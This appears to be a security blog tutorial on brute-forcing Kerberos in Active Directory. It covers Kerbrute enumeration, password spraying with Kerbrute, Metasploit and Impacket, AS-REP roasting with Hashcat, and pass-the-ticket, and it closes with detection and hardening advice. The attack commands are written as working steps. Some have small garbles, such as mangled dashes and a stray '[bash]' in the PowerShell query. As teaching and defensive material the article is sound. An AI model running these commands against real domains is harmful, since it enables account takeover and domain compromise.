Listen to this Post
Introduction:
Kerberos is the default authentication protocol in Microsoft Active Directory (AD), relied upon by enterprises worldwide for secure identity verification. However, when misconfigured — especially with weak password policies or disabled account lockout — attackers can perform brute-force attacks against the Kerberos service on port 88, enabling username enumeration, password guessing, and eventual domain compromise. This article dissects real-world Kerberos abuse techniques, provides hands-on commands using tools like Kerbrute, Rubeus, and Metasploit, and offers actionable hardening steps to defend your AD environment.
Learning Objectives:
- Understand how Kerberos pre-authentication works and why it can be brute-forced.
- Execute username enumeration and password spraying attacks against Active Directory using Kerbrute and Metasploit.
- Apply detection rules and mitigation controls to block Kerberos brute-force attempts.
You Should Know:
1. Kerberos Authentication Basics and Attack Surface
Kerberos uses tickets (TGT, TGS) and involves three entities: client, Key Distribution Center (KDC), and resource server. The KDC listens on port 88 (UDP/TCP). In a brute-force scenario, attackers send AS-REQ (Authentication Service Request) messages with guessed usernames/passwords and analyze the error codes in AS-REP responses. Common reply codes:
– `eRR-PREAUTH-FAILED` (0x12) → valid username, wrong password.
– `eRR-NO-SUCH-USER` (0x6) → invalid username.
Attack prerequisite: No account lockout policy, or a lockout threshold high enough to allow many guesses.
Linux command to test Kerberos connectivity:
nmap -p 88 --script krb5-enum-users <DC-IP>
Windows PowerShell test:
Test-NetConnection -ComputerName <DC-FQDN> -Port 88
2. Username Enumeration with Kerbrute (Linux)
Kerbrute is a fast tool that uses Kerberos pre-authentication to enumerate valid domain users without generating Windows event 4625 (failed logon) if done carefully.
Step‑by‑step guide:
1. Install Kerbrute on Kali Linux:
sudo apt install kerbrute -y or download from GitHub wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 chmod +x kerbrute_linux_amd64 sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute
2. Prepare a username wordlist (e.g., `names.txt`):
administrator jsmith mross bkane
3. Enumerate users against the Domain Controller (DC):
kerbrute userenum --dc <DC-IP> -d <DOMAIN> names.txt
Example:
kerbrute userenum --dc 192.168.1.10 -d corp.local users.txt
4. Output will show `[+] VALID USERNAME:` for found users and `[!] Invalid username` for others.
Windows alternative with PowerShell and Rubeus:
.\Rubeus.exe brute /users:users.txt /domain:corp.local /dc:192.168.1.10
3. Password Brute-Force Against Kerberos
Once valid usernames are identified, attackers perform password spraying (one common password against many users) or traditional brute-force.
Using Kerbrute for password spraying:
kerbrute passwordspray --dc <DC-IP> -d <DOMAIN> userlist.txt "Winter2025"
Using Metasploit auxiliary module:
msf6 > use auxiliary/admin/kerberos/kerberos_login msf6 auxiliary(admin/kerberos/kerberos_login) > set RHOSTS <DC-IP> msf6 auxiliary(admin/kerberos/kerberos_login) > set DOMAIN <DOMAIN> msf6 auxiliary(admin/kerberos/kerberos_login) > set USER_FILE /path/to/users.txt msf6 auxiliary(admin/kerberos/kerberos_login) > set PASS_FILE /path/to/passwords.txt msf6 auxiliary(admin/kerberos/kerberos_login) > run
Manual approach using Impacket (Linux):
Single user, single password python3 /usr/share/doc/python3-impacket/examples/getTGT.py <DOMAIN>/<USER> -dc-ip <DC-IP> -password '<PASSWORD>' Password spraying loop for user in $(cat users.txt); do python3 getTGT.py corp.local/$user -dc-ip 192.168.1.10 -password 'Spring2025' 2>/dev/null && echo "SUCCESS: $user" done
Important: These attempts generate event ID 4771 (Kerberos pre-authentication failed) on the DC, which can trigger alerts.
4. Exploiting Pre-Authentication Weaknesses (AS-REP Roasting)
If a user account has the “Do not require Kerberos pre-authentication” setting enabled, an attacker can request an AS-REP ticket and crack it offline — no password needed, only username enumeration.
Step‑by‑step using Rubeus (Windows):
1. Enumerate users with pre-auth disabled:
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep-hashes.txt
2. Crack the hash with Hashcat (Linux):
hashcat -m 18200 asrep-hashes.txt /usr/share/wordlists/rockyou.txt
Using Impacket (Linux):
python3 GetNPUsers.py <DOMAIN>/ -dc-ip <DC-IP> -request -format hashcat -outputfile asrep.txt
Mitigation: Identify and disable the “Do not require Kerberos pre-authentication” flag on all user accounts (it should never be enabled except for legacy service accounts).
- Real-World AD Attack Chain: From Enumeration to Privilege Escalation
A typical red team sequence:
- Reconnaissance: Use `kerbrute userenum` to find valid usernames from an external or internal position.
- Password spraying: Try seasonal passwords (e.g.,
Summer2025!,Corp@2025) against all enumerated users. - Initial access: Valid credentials grant a TGT, which can be used with `kinit` (Linux) or Rubeus to request service tickets.
- Lateral movement: Use `psexec` or `winrm` with the stolen TGT.
- Privilege escalation: Dump LSASS, perform DCSync, or abuse Kerberoastable service accounts.
Example Linux command to request TGT after cracking a password:
kinit [email protected] klist
Example Windows (Rubeus) to request TGT and pass the ticket:
.\Rubeus.exe asktgt /user:jsmith /password:Summer2025! /domain:corp.local /dc:192.168.1.10 /ptt
- Detection and Hardening – Stop Kerberos Brute Force
Detection via Windows Event Logs:
- Event ID 4771 (Kerberos pre-authentication failed) – Look for many failures from same source IP across multiple accounts.
- Event ID 4625 (Logon failure) – Also generated, but 4771 is specific to Kerberos.
- Event ID 4768 (Kerberos TGT requested) – Unusual volume may indicate spraying.
PowerShell query to detect brute-force:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4771} | Where-Object {$<em>.Message -match "0x12"} | Group-Object -Property @{Expression={$</em>.Properties[bash].Value}} | Where-Object {$_.Count -gt 10}
Hardening measures:
- Enforce account lockout policy (e.g., 5 invalid attempts lockout for 15 minutes).
- Enable SMB signing and LDAP signing to prevent relay attacks.
- Disable RC4 encryption for Kerberos (use AES).
- Regularly audit accounts with “Do not require pre-authentication”.
- Deploy a SIEM with rules for 4771 spikes.
Group Policy path for lockout:
`Computer Configuration → Windows Settings → Security Settings → Account Policies → Account Lockout Policy`
7. Tools and Commands Reference Table
| Tool | Platform | Purpose | Example |
||-|||
| Kerbrute | Linux | Username enum, password spray | `kerbrute userenum –dc 10.0.0.1 -d lab.local users.txt` |
| Rubeus | Windows | AS-REP roast, TGT request, brute | `.\Rubeus.exe brute /passwords:pass.txt /noticket` |
| Metasploit | Cross | Kerberos login module | `use auxiliary/admin/kerberos/kerberos_login` |
| Impacket | Linux | GetTGT, GetNPUsers, Kerberoast | `python3 GetNPUsers.py domain.com/ -dc-ip 10.0.0.1 -request` |
| Hashcat | Linux | Crack AS-REP or TGS hashes | `hashcat -m 18200 asrep.txt rockyou.txt` |
What Undercode Say:
- Key Takeaway 1: Kerberos brute-force is not theoretical — tools like Kerbrute make it trivial to enumerate users and spray passwords, especially when account lockout is disabled. Many enterprises overlook Kerberos-specific logging, allowing attackers to go unnoticed.
- Key Takeaway 2: AS-REP roasting remains a high-impact, low-noise attack because it doesn’t require any password guess — only a valid username. Removing the “pre-authentication not required” flag from all user accounts is a quick win.
Analysis: While modern EDR and SIEM solutions can detect Kerberos brute-force via event ID 4771 spikes, attackers have adapted by slowing down password sprays (e.g., one attempt every 30 minutes) or using distributed source IPs. Defenders must combine lockout policies, network segmentation, and Kerberos hardening (AES-only, pre-auth required) to effectively mitigate. Additionally, moving towards passwordless authentication (e.g., Windows Hello for Business, FIDO2) eliminates the password spray surface entirely.
Prediction:
Within two years, AI-driven Kerberos attacks will emerge — using large language models to generate targeted username and password wordlists based on scraped LinkedIn profiles, corporate email formats, and breach dumps. Simultaneously, cloud-joined AD (Azure AD DS) and hybrid identities will introduce new Kerberos attack paths via on-prem connectors. The most effective defense will shift from reactive brute-force detection to proactive credential elimination using certificate-based or biometric authentication, making Kerberos password attacks obsolete — but only for organizations that fully migrate. Those stuck with legacy AD will remain vulnerable to the same techniques described in this guide.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Kinjalpatel Pt – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
